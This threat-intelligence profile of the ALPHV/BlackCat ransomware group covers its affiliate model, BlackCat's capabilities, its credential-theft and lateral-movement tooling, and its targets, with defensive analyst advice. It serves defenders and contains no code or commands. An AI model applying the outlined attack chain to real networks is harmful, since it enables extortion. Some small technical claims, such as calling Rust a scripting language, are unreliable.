Threat Actor Profile: ALPHV Ransomware Group

ALPHV is a financially motivated actor that emerged in late 2021. They operate as a Ransomware-as-a-Service (RaaS) model, primarily for their novel BlackCat ransomware. This actor is part of a family of Russia-based ransomware syndicate groups. For attribution, this actor is tracked under other names including UNC4466, BlackCat and Noberus. RaaS is a model of criminal extortion operations where a ransomware author markets access to their malware payload to affiliate actors. These affiliates commonly carry out tasks such as target selection and exploitation with the author setting certain rules such as ransom amount and even limitations to target types. The malware author sets a percentage cut of the collected ransom from victims to the affiliates with ALPHV providing up to a generous 90% to its affiliates. ALPHV uses a combination of publicly available and novel tools across its attack chain that’s tied together to a triple extortion tactic. The group has targeted entities in the manufacturing, medical, transportation and financial industry sectors across several countries including the United States, Australia, Germany, Italy and the United Kingdom.

Known Techniques & Capabilities

ALPHV’s primary payload is the BlackCat ransomware, which is unique for being developed in the Rust scripting language. This allows BlackCat to be deployed on both Windows and Linux environments, including various Windows operating systems and Linux distributions. The BlackCat ransomware comes with anti-analysis capabilities using the Zeroize library, which removes attributable artifacts from memory. ALPHV operations are often highly targeted, which is reflected in the custom configurations discovered in analyzed BlackCat payload samples. BlackCat ships with a variety of configurations written in JSON, which ALPHV affiliates can customize in the post-reconnaissance phase. The ransomware can be configured to use a variety of different encryption modes. These include full file encryption, as well as SmartPattern and DotPattern encryption options. These default configurations can be overridden to accommodate different circumstances in the target environment. It must also run with a 32-bit access token. Special features of both Linux and Windows variants include:

· Support for VMWare ESXi for the purpose of stopping virtual machines and deleting VM snapshots.

· Escalate privileges via the bypassing of User Account Control (UAC); Masquerade_PEB; the exploitation of ‘CreateProcessWithLogonW’ API tracked as CVE-2016–0099.

· Using ‘fsutil’ to enable ‘remote to local’ and ‘remote to ‘remote’.

· Acquires the universally unique identifier (UUID) from the host via the Windows Management Interface Command-line (WMIC).

· Use PsExec to execute the ransomware on a remote host for expanded propagation.

Analyst Comments:

The targeting of Linux environments is likely an additional technique aimed at virtual environments such as VMWare ESXi that are commonly used to store file system backups. Successfully targeting these environments can deny a victim the ability to recover files encrypted by BlackCat in their enterprise environment. This technique was also notably employed by the BlackMatter and Conti ransomware actors in 2021. Other features of the ransomware are more common among other ransomware families such as removing shadow copies and terminating specific processes like Microsoft Exchange and Office applications. If you’re maintaining recovery backups in a virtual environment, it’s strongly recommended to keep such environments insulated and disconnected from your network.

As mentioned, ALPHV uses a triple extortion technique for its targets which involves the exfiltration of sensitive information but with the addition of threatening the victim with distributed denial of service (DDoS) attacks if the demanded ransom is not paid. Exmatter is one tool used by ALPHV for the exfiltration of data. At the start of an operation, ALPHV affiliates will conduct reconnaissance to profile the target, allowing them to better configure follow-on tools and BlackCat.

ALPHV affiliates commonly use phishing, open ports, known vulnerabilities and stolen credentials for initial access which are common initial vectors among other ransomware groups. Stolen credentials become another component to ALPHV’s activity during the later privilege escalation and lateral movement stages. A recently observed ALPHV operation saw the exploitation of vulnerabilities affecting the Veritas Backup Exec installations that included CVE-2021–27876, CVE-2021–27877 and CVE-2021–27878. Additionally, the scanning tools Advanced IP Scanner by Famatech and ADRecon are downloaded onto the victim’s environment. ADRecon is a tool that allows ALPHV to effectively map an Active Directory environment, if present, and provides this back to the attacker in a generated report.

Analyst Comments:

Organizations can take proactive steps to mitigate against these attack vectors by closely monitoring traffic coming from Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) services. In other cases, turning off RDP altogether would be recommended if the port is not in use. Likewise, having strong password and authentication policies in place is critical to preventing unauthorized access or limiting lateral movement. This includes complex passwords with regular enforced changes and the implementation of multi-factor authentication and securing certificate authorities. Limit the permissions of users and user groups to avoid the unauthorized creation of tokens. Patch management can minimize additional points of entry. Above all else, maintaining good behavioral detections can be effective against Living-off-the-Land (LOTL) techniques commonly used by ransomware actors. ALPHV is also noted for conducting thorough information-gathering which allows them to create a clearer profile of a target organization and potential initial vectors they can exploit. Metasploit is another common tool used for legitimate penetration testing that’s been used by ALPHV as well as other threat actors. Exploit kits could be further aiding ALPHV in more quickly identifying exploitable vulnerabilities.

On top of using already stolen credentials, ALPHV utilizes publicly available tools for scrapping credentials within a target environment. Nanodump, Mimikatz and LaZagne allow the attacker to gather clear-text passwords. These tools are downloaded onto the target system using the Background Intelligence Transfer Service (BITS). The gathering of additional credentials allows ALPHV to manipulate and escalate account privileges as well as carry out lateral movement. RDP is also a common vector point used for moving laterally (T1021.001) along with PsExec which lets ALPHV remotely execute processes. For establishing persistence, ALPHV operators will leverage legitimate Windows services (T1543.003), generating Registry run keys to execute their tools at system startup (T1547.001) and create system processes (T1543).

Outside of the obfuscation capabilities built within BlackCat, ALPHV operators also clear event logs (in Windows environments), conduct token manipulation and theft, and disable real-time monitoring tools that include Windows Defender.

Targets

ALPHV shows little restraint in their targeting approach, and has directed its activity against organizations across nearly all industry sectors. These have included transportation services, logistics, manufacturing, technology, energy, financial, medical and communications. This indiscriminate level of targeting could be a carryover trait from members of the former REvil and BlackMatter ransomware groups.

Closing Analysis

As of April 2023, ALPHV has developed into a highly prolific criminal group, only falling behind the Lockbit ransomware group in observed activity. Being primarily based in the Russian Federation, ALPHV will unlikely target organizations based in Russia and the surrounding region that makes up the Commonwealth of Independent States (CIS).

There is also some confidence that ALPHV may be comprised of members from the now defunct REvil, DarkSide and BlackMatter ransomware groups. In addition to that history, the current ALPHV group is believed to have links to other Russia-based cybercrime syndicates such as FIN7 and FIN12.

While ALPHV does not have the footprint of actors like Lockbit, TA505 and TA542 (creators of Emotet), their rapid growth, innovation, operational patience and lack of restraint make them a high threat to organizations with services and interests across the globe. The novel characteristics of the BlackCat payload, and its reach are compounded by a robust anti-analysis/detection component of ALPHV campaigns. The use of a triple extortion tactic further enhances the current threat this group poses to many organizations. Finally, this actor represents years of learning from previous ransomware groups, likely encompassing very skilled individuals. It’s highly likely this actor will continue to grow its activity through the rest of 2023.